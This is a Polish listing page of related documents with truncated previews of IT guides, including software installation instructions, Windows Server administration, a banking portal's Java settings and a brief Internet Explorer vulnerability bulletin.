Instalacja Webroot SecureAnywhere przy użyciu GPO w Active Directory Instalacja Webroot SecureAnywhere przy użyciu GPO w Active Directory Poniższa instrukcja opisuje sposób zdalnej instalacji oprogramowania Webroot SecureAnywhere w środowiskach wykorzystujących usługę Active

Bardziej szczegółowo

Symfonia Produkcja Instrukcja instalacji. Wersja 2013

Symfonia Produkcja Instrukcja instalacji. Wersja 2013 Symfonia Produkcja Instrukcja instalacji Wersja 2013 Windows jest znakiem towarowym firmy Microsoft Corporation. Adobe, Acrobat, Acrobat Reader, Acrobat Distiller są zastrzeżonymi znakami towarowymi firmy

Bardziej szczegółowo

Instrukcja instalacji programu e STOMis wraz z pakietem Microsoft SQL Server 2005 Express Edition. e STOMis

Instrukcja instalacji programu e STOMis wraz z pakietem Microsoft SQL Server 2005 Express Edition. e STOMis Instrukcja instalacji programu e STOMis wraz z pakietem Microsoft SQL Server 2005 Express Edition e STOMis Strona:1 z 10 I. Wymagania sprzętowe i wymagania w zakresie programowania systemowego. Wymagania

Bardziej szczegółowo

Instalacja SQL Server Express. Logowanie na stronie Microsoftu

Instalacja SQL Server Express. Logowanie na stronie Microsoftu Instalacja SQL Server Express Logowanie na stronie Microsoftu Wybór wersji do pobrania Pobieranie startuje, przechodzimy do strony z poradami. Wypakowujemy pobrany plik. Otwiera się okno instalacji. Wybieramy

Bardziej szczegółowo

System Kancelaris. Zdalny dostęp do danych

System Kancelaris. Zdalny dostęp do danych Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,

Bardziej szczegółowo

CitiDirect Online Banking - portal CitiDirect EB

CitiDirect Online Banking - portal CitiDirect EB CitiDirect Online Banking - portal CitiDirect EB Dodatkowa informacja dotycząca konfiguracji zabezpieczeń oprogramowania Java Pomoc Techniczna CitiDirect CitiService Pomoc Techniczna CitiDirect Tel. 0

Bardziej szczegółowo

Data modyfikacji: 2013-08-14

Data modyfikacji: 2013-08-14 Data modyfikacji: 2013-08-14 Co zawiera ten dokument: Ten dokument przedstawia, w jaki sposób zainstalować program Kancelaris PLUS 4 za pomocą standardowego instalatora na serwerze MySQL w wersji 5.0 i

Bardziej szczegółowo

Co nowego w systemie Kancelaris 3.31 STD/3.41 PLUS

Co nowego w systemie Kancelaris 3.31 STD/3.41 PLUS Ten dokument zawiera informacje o zmianach w wersjach: 3.31 STD w stosunku do wersji 3.30 STD 3.41 PLUS w stosunku do wersji 3.40 PLUS 1. Kancelaria 1.1. Opcje kancelarii Co nowego w systemie Kancelaris

Bardziej szczegółowo

Instalacja oprogramowania Rigel Med-eBase dla systemów Windows XP, 7 oraz 8.

Instalacja oprogramowania Rigel Med-eBase dla systemów Windows XP, 7 oraz 8. Nota Aplikacyjna 0037 Instalacja oprogramowania Rigel Med-eBase dla systemów Windows XP, 7 oraz 8. W celu instalacji oprogramowania Rigel Med-eBase należy spełnić minimalne wymagania sprzętowe opisane

Bardziej szczegółowo

Internet Explorer. Okres 05-12.06.2008

Internet Explorer. Okres 05-12.06.2008 Okres 05-12.06.2008 Internet Explorer W przeglądarce Internetowej Internet Explorer ujawniono lukę związaną z bezpieczeństwem, która moŝe pozwolić osobie nieupowaŝnionej na przejęcie kontroli nad komputerem

Bardziej szczegółowo

STATISTICA 8 WERSJA SIECIOWA CONCURRENT INSTRUKCJA INSTALACJI

STATISTICA 8 WERSJA SIECIOWA CONCURRENT INSTRUKCJA INSTALACJI STATISTICA 8 WERSJA SIECIOWA CONCURRENT INSTRUKCJA INSTALACJI Uwagi: 1. Instalacja wersji sieciowej concurrent składa się z dwóch części: a) instalacji na serwerze oraz b) instalacji na każdej stacji roboczej.

Bardziej szczegółowo

Instrukcja zgłaszania błędu

Instrukcja zgłaszania błędu Instrukcja zgłaszania błędu 1 Kanały zgłaszania Do dyspozycji są trzy kanały zgłoszeń: A. AnswerTrack 2 aby skorzystać z tego kanału należy posiadać założone konto użytkowania AT2 (pkt.3), wypełnić formularz

Bardziej szczegółowo

Instrukcja Integracja z istore. Wersja z 07/02/2015. Copyright Zakupteraz.pl

Instrukcja Integracja z istore. Wersja z 07/02/2015. Copyright Zakupteraz.pl Instrukcja Integracja z istore Wersja z 07/02/2015 Copyright Zakupteraz.pl 1. SPIS TREŚCI 1. SPIS TREŚCI... 2 2. WSTĘP... 3 3. OPIS PROCEDURY INTEGRACJI... 4 1.1. LOGOWANIE... 4 1.2. PANEL KLIENTA INTEGRACJA

Bardziej szczegółowo

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe Lp. Parametry wymagane przez Zamawiającego (nazwa oferowanego oprogramowania) Parametry oferowane przez Wykonawcę (TAK- parametry zgodne z wymaganymi

Bardziej szczegółowo

System komputerowy. Sprzęt. System komputerowy. Oprogramowanie

System komputerowy. Sprzęt. System komputerowy. Oprogramowanie System komputerowy System komputerowy (ang. computer system) to układ współdziałaniadwóch składowych: sprzętu komputerowegooraz oprogramowania, działających coraz częściej również w ramach sieci komputerowej.

Bardziej szczegółowo

INSTRUKCJA OBSŁUGI BIULETYNU INFORMACJI PUBLICZNEJ

INSTRUKCJA OBSŁUGI BIULETYNU INFORMACJI PUBLICZNEJ INSTRUKCJA OBSŁUGI BIULETYNU INFORMACJI PUBLICZNEJ W celu wprowadzenia, modyfikacji lub usunięcia informacji w Biuletynie Informacji Publicznej należy wpisać w przeglądarce adres strony: http:/bip.moriw.pl/admin.php

Bardziej szczegółowo

Snifery wbudowane w Microsoft Windows

Snifery wbudowane w Microsoft Windows Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany

Bardziej szczegółowo

Wdrożenie modułu płatności eservice. dla systemu Zen Cart 1.3.9 1.5

Wdrożenie modułu płatności eservice. dla systemu Zen Cart 1.3.9 1.5 Wdrożenie modułu płatności eservice dla systemu Zen Cart 1.3.9 1.5 - dokumentacja techniczna Wer. 01 Warszawa, styczeń 2014 1 Spis treści: 1 Wstęp... 3 1.1 Przeznaczenie dokumentu... 3 1.2 Przygotowanie

Bardziej szczegółowo

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami Windows Serwer 2008 R2 Moduł 5. Zarządzanie plikami Sprawdzamy konfigurację kart sieciowych 172.16.x.0 x nr w dzienniku Na serwerze musi działać Internet! Statyczny adres IP jest potrzebny komputerom,

Bardziej szczegółowo